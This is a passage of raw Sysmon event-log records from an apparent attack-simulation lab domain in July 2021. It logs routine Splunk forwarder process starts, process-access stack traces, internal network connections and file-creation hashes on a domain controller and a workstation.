Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.547{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7DF-60EB-E07D-00000000CF01}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.541{466BC892-F7DF-60EB-E07D-00000000CF01}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001054078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:43.119{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57438-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001054077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.163{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A3C603B8320AE7E1591B5BC52C6D7ADD,SHA256=D3C5415F2308CA681012F1D9A50ADF4C9576C1F59E29B850B70C4DA257525F61,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.900{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7E0-60EB-E27D-00000000CF01}9448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:52.900{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.900{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.900{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F7E0-60EB-E27D-00000000CF01}9448C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.900{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:52.900{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.900{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7E0-60EB-E27D-00000000CF01}9448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.881{466BC892-F7E0-60EB-E27D-00000000CF01}9448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.764{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD556319598330280BD028017301C6E5,SHA256=BE6E8C8192FD090D1B47799C2F36EF4761E1EDE18D323EED86A07084BF42BFD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810037Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:52.011{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE01792328C14E7A5F475307298A99CE,SHA256=435936B88978AD6263825CC968CAB04C541B62CCBDD610BDAE584A85D65033F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.547{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=854462229D8E3DD430DFEA2754F40177,SHA256=CB422239845D74463F2187F5BA17E6B9D2DDED9E5E2EFF850FFC3F7B2DC083BA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.512{466BC892-F7E0-60EB-E17D-00000000CF01}78683752C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.228{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7E0-60EB-E17D-00000000CF01}7868C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.212{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:52.212{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.212{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:52.212{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.212{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F7E0-60EB-E17D-00000000CF01}7868C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.212{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7E0-60EB-E17D-00000000CF01}7868C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.213{466BC892-F7E0-60EB-E17D-00000000CF01}7868C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001054119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.889{466BC892-F7E1-60EB-E37D-00000000CF01}98329420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.889{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95628B1B8A1970FF15578A387A4001CB,SHA256=9A9990991A789BD854AF6EDA6486C19E620DEC0264AF7BCB86339BDD4B365EB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.773{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98FDF10C7819D3173CEF6A2011C1AEE7,SHA256=ED168D2F12C036E7D0C0887A5FE3686E57BB72C0DB95B4C9878E720284EBAC6C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810039Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:52.363{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57439-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810038Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:53.011{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=429C2FA5D39B2C840EAC5D170ECA5A0A,SHA256=3E890E51F1431AA4D8B9A34A51C3ACE36441AEE62D019D84E9731CC957AD67E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.573{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7E1-60EB-E37D-00000000CF01}9832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.573{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:53.573{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 